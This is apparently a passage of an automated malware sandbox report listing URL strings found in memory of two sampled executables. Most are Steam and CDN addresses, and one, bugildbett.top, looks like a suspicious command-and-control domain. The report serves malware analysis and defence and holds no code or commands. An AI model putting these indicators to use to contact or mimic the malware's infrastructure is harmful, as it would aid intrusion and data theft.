            Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.enigmaprotector.com/
            Source: jaclo.exe, 0000000D.00000002.1400014459.0000000000BFE000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
            Source: dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef7K
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugildbett.top/
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
            Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.clo
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612147123.0000000001255000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732
            Source: dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523296079.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=kLO
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
            Source: dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/imagsM
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
